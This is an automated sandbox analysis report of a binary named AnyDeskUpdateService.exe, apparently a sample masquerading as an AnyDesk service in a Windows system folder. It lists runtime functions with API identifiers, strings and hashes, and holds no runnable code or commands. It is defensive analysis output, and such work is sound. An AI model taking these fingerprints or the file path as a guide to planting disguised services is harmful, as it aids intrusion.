                                                                                                      Function 00007FF71DD9B5F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                      • Opcode ID: 80b5b027944e6adf200c0c0f2cdfffeff40a07b0781abe7934c39ef61a7b1e17
                                                                                                      • Instruction ID: 78924c960722f885ba614d39027b6c3e0e9534107565a2d7efaa59705e4008db
                                                                                                      • Opcode Fuzzy Hash: 80b5b027944e6adf200c0c0f2cdfffeff40a07b0781abe7934c39ef61a7b1e17
                                                                                                      • Instruction Fuzzy Hash: B151B13290CB4A86DB28AB119084278B792FB45BA4FD64136EACC47785DF3EE458CF11
                                                                                                      Function 00007FF71DD93E90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                      • Opcode ID: 9fcd7cb336c16f75f25f9420c924380d4a991d24cfce7f84e0b3057f1f7ebc5e
                                                                                                      • Instruction ID: f43ff70b521ab55f44728dedbc7c0156d6a4a52d46ee770e316e49af9283bb07
                                                                                                      • Opcode Fuzzy Hash: 9fcd7cb336c16f75f25f9420c924380d4a991d24cfce7f84e0b3057f1f7ebc5e
                                                                                                      • Instruction Fuzzy Hash: F141DF22B0EE45C9EB18EFB0D4502BC7371EF44B18F844036DE8D27A59EE39D41A8724
                                                                                                      Function 00007FF71DD94010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                      • Opcode ID: c0416db31ead1b90ad17fdb051eb07fe199fd48def58b7b7f5e660e329d7bcf7
                                                                                                      • Instruction ID: 67bea48a581e5308573235d887f3bb36c755b039ff3024cc3cad7798caa90a45
                                                                                                      • Opcode Fuzzy Hash: c0416db31ead1b90ad17fdb051eb07fe199fd48def58b7b7f5e660e329d7bcf7
                                                                                                      • Instruction Fuzzy Hash: 8C41BE32B0EA0599EB18EFB0D4502EC7375EF44B18F844036DA8C27A56EE39D4198768
                                                                                                      Function 00007FF71DDABE9C Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 2718003287-0
                                                                                                      • Opcode ID: f4985b051c93d1ffe9d611e842d6d6136a1aebebfe2613dad447161918752a3f
                                                                                                      • Instruction ID: 8514fc8bd6584572140630c47fe27ec9ec4638d46dbc2fd3a60bb07f10b1ff6d
                                                                                                      • Opcode Fuzzy Hash: f4985b051c93d1ffe9d611e842d6d6136a1aebebfe2613dad447161918752a3f
                                                                                                      • Instruction Fuzzy Hash: D2D1F536B0CA8589E711DFA9C4405AC7771FB44BA8F848136CE9D97B99EE38D40ACB10
                                                                                                      Function 00007FF71DDB40AC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CodeInfoPageValid
                                                                                                      • String ID: COMSPEC
                                                                                                      • API String ID: 546120528-1631433037
                                                                                                      • Opcode ID: 46c349e5193ee86d75655e4a574d5ad4ddb955498f1696478ddccb8521d54604
                                                                                                      • Instruction ID: a384af833afde09a941f79590c86cfc8754d5edba4feffe924ff9d73f1758c99
                                                                                                      • Opcode Fuzzy Hash: 46c349e5193ee86d75655e4a574d5ad4ddb955498f1696478ddccb8521d54604
                                                                                                      • Instruction Fuzzy Hash: 6E81F662E0CE8A66E764EF559050179F7A1EB02768FC84037C6CE47690EE3CF6499B20
                                                                                                      Function 00007FF71DD9B828 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                      • Opcode ID: 1ef23a5464c2794de408efda5d84bcc14a94eddb4dc116ddde8cda1a9e36996f
                                                                                                      • Instruction ID: b289f06c215bd3ee2caf10dec1d4d7fcca0d997900a1f3ff3995395151baf8cb
                                                                                                      • Opcode Fuzzy Hash: 1ef23a5464c2794de408efda5d84bcc14a94eddb4dc116ddde8cda1a9e36996f
                                                                                                      • Instruction Fuzzy Hash: EE71E57250CA8686DB349F25D08037DBB92EB04BA4F868136DECC07685EF2DD455CB50
                                                                                                      Function 00007FF71DD9BED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2558813199-1018135373
                                                                                                      • Opcode ID: 635710ddb9ab94d1a55a8cd141b7dc412ae530ff3b0bfee5224db4b61107a7b5
                                                                                                      • Instruction ID: 319b0056d61f2572d9c09404a5b3b12d57eca92db5728503d6d1b3d39f12ed9a
                                                                                                      • Opcode Fuzzy Hash: 635710ddb9ab94d1a55a8cd141b7dc412ae530ff3b0bfee5224db4b61107a7b5
                                                                                                      • Instruction Fuzzy Hash: 0551613261CB4A86D624AF26E44026EB7B5F788BA0F501136EBCD07B55EF39E454CF10
                                                                                                      Function 00007FF71DDA7114 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                      • String ID: C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                      • API String ID: 3580290477-3169726793
                                                                                                      • Opcode ID: 015c39d85a576662478ad2c262c788667b722bdcede0a06fe6200da70104d747
                                                                                                      • Instruction ID: 98bb2407a4218898cd11ab362fb7c8b3f034a0040f6385a88d900c56d7833434
                                                                                                      • Opcode Fuzzy Hash: 015c39d85a576662478ad2c262c788667b722bdcede0a06fe6200da70104d747
                                                                                                      • Instruction Fuzzy Hash: 1741A532A0CF0A95EF15FF2194401BCA7A5EB45BA4BD58037ED8E43785EE3CE4498B20
                                                                                                      Function 00007FF71DDAC534 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: 45453d0a4cb618e3adf22ee76669d7d8896708ec24ad589fac43c11eaffff017
                                                                                                      • Instruction ID: 745f38ab6538faaf7833654f4af52988b364c977a2651b39ea4791097b5a12de
                                                                                                      • Opcode Fuzzy Hash: 45453d0a4cb618e3adf22ee76669d7d8896708ec24ad589fac43c11eaffff017
                                                                                                      • Instruction Fuzzy Hash: 8C41A722B1CE4591DB10DF25E4443B9A7A1FB48BA4F858036EE8D87794EF3CD445CB50
                                                                                                      Function 00007FF71DD995E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 1f17b112604c356c224eb2ed1e8f8d2ca513bdd1cb9f3ebf4d5e436a80b3cb1e
                                                                                                      • Instruction ID: f2d49836d20caf98b44b011c50ee682304328d971c054b7e07145f51026d3b3d
                                                                                                      • Opcode Fuzzy Hash: 1f17b112604c356c224eb2ed1e8f8d2ca513bdd1cb9f3ebf4d5e436a80b3cb1e
                                                                                                      • Instruction Fuzzy Hash: 5711373261CB8582EB259F15E40026AB7A5FB88B94F984236EACC47758EF3DC5558B00